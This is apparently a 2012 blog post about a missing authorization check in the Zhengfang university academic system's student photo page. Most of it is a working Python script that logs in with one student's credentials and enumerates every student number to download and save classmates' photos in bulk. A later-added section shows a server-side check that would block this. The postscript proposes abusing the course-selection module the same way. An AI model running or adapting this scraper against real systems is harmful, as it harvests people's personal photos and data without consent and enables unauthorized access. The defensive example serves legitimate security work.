One vulnerability in the Zhengfang (正方) system is that it performs no identity check when a student photo is fetched. In principle, fetching student Li Si's photo should first require determining whether the logged-in user is a teacher or a student, and, if a student, whether that user is Li Si himself. Zhengfang does not do this well, so Zhang San can easily obtain Li Si's photo.
Below is a simple crawler the author wrote; the Python code (Python 3.2) follows.

```python
import http.client
import urllib.parse   # urllib.parse must be imported explicitly on Python 3
import os

_xh = '**********'    # student number used to log in
_pw = '**********'    # password

VIEWSTATE = 'dDwtMTIwMTU3OTE3Nzs7PpxRSEGelcLnTaPgA3v56uoKweD+'
host = 'jwc.****.edu.cn:8989'
main_url = 'http://' + host
login_page = '/default2.aspx'
login_url = main_url + login_page
readimage_page = '/readimagexs.aspx'

print(main_url)
print(login_url)

conn = http.client.HTTPConnection(host)

# ASP.NET login form: __VIEWSTATE plus the username/password text boxes
login_post_data = urllib.parse.urlencode({
    '__VIEWSTATE': VIEWSTATE,
    'TextBox1': _xh,
    'TextBox2': _pw,
    'RadioButtonList1': '學生',
    'Button1': '',
    'lbLanguage': ''
})
login_post_data = login_post_data.encode('utf-8')

login_headers = {
    'Host': host,
    'Connection': 'keep-alive',
    'Origin': main_url,
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Referer': main_url,
    'Accept-Encoding': 'gzip,deflate,sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Accept-Charset': 'GBK,utf-8;q=0.7,*;q=0.3'
}

conn.request('POST', login_page, body=login_post_data, headers=login_headers)
result = conn.getresponse()
print(result.status)
#print(result.read())
# keep only the session cookie (name=value) from the Set-Cookie header
cookie = result.msg['set-cookie'].split(';')[0]
#print(cookie)
conn.close()

readimage_headers = {
    'Host': host,
    'Connection': 'keep-alive',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Encoding': 'gzip,deflate,sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Accept-Charset': 'GBK,utf-8;q=0.7,*;q=0.3',
    'Cookie': cookie
}

# visit the student main page once with the logged-in session
conn.request('GET', '/xs_main.aspx' + '?' + 'xh=' + _xh, headers=readimage_headers)
#result = conn.getresponse()
#print(result.status)
#print(result.read())
conn.close()

# student numbers are built as year/college/major/class/serial, two digits each
os.makedirs(os.path.abspath('./pic/'), exist_ok=True)
for year in range(1, 12):        # 11
    for college in range(1, 20):  # 19
        for major in range(1, 15):  # 14
            for mclass in range(1, 10):
                for series in range(1, 50):
                    image_xh = "%02d%02d%02d%02d%02d" % (year, college, major, mclass, series)
                    readimage_url = readimage_page + '?' + 'xh=' + image_xh
                    print(readimage_url)
                    conn.request('GET', readimage_url, headers=readimage_headers)
                    result = conn.getresponse()
                    #print(result.status)
                    image = result.read()
                    # anything larger than 1 KiB is treated as a real photo
                    if len(image) > 1024:
                        save_path = os.path.join(os.path.abspath('./pic/'), image_xh + '.bmp')
                        print(save_path)
                        fp = open(save_path, 'wb')
                        fp.write(image)
                        fp.close()
                    else:
                        print('skip')
print('done')
conn.close()
```
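The check the post says is missing, as an added example written for this edit and not part of the original post or of the Zhengfang system: the photo endpoint decides from the authenticated session, not from the `xh` in the query string, whether the caller may see the requested photo. The `Session`, `Role`, `PHOTOS` and `serve_student_photo` names are hypothetical, and the photo bytes are constructed placeholders.

```python
from collections import Counter
from dataclasses import dataclass
from enum import Enum


class Role(Enum):
    STUDENT = "student"
    TEACHER = "teacher"


@dataclass(frozen=True)
class Session:
    user_id: str  # for a student this is their own xh (student number)
    role: Role


# Constructed sample photo store keyed by xh; the bytes are placeholders.
PHOTOS = {
    "0101010101": b"BM<zhangsan photo bytes>",
    "0101010102": b"BM<lisi photo bytes>",
}

# Denied requests per user. A session that racks these up is walking the
# xh space, which is exactly the access pattern the crawler above produces.
DENIED = Counter()


def can_view_photo(session, requested_xh):
    """Teacher: any student. Student: only their own xh. Otherwise: no."""
    if session is None:
        return False
    if session.role is Role.TEACHER:
        return True
    return session.role is Role.STUDENT and session.user_id == requested_xh


def serve_student_photo(session, requested_xh):
    """Return (status, body) for readimagexs.aspx?xh=<requested_xh>.

    The xh in the query string is only a lookup key; whether it may be
    read is decided from the authenticated session, never from the URL.
    """
    if not can_view_photo(session, requested_xh):
        DENIED[session.user_id if session else "anonymous"] += 1
        # Deny before touching the store, so that 403 versus 404 does not
        # reveal whether the requested xh exists.
        return 403, b""
    image = PHOTOS.get(requested_xh)
    if image is None:
        return 404, b""
    return 200, image
```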
Postscript: Zhengfang's course-selection module still has the same kind of vulnerability, so in principle peeking at other people's courses and brute-forcing course selection can be carried out the same way.
2012-07-01
By whypro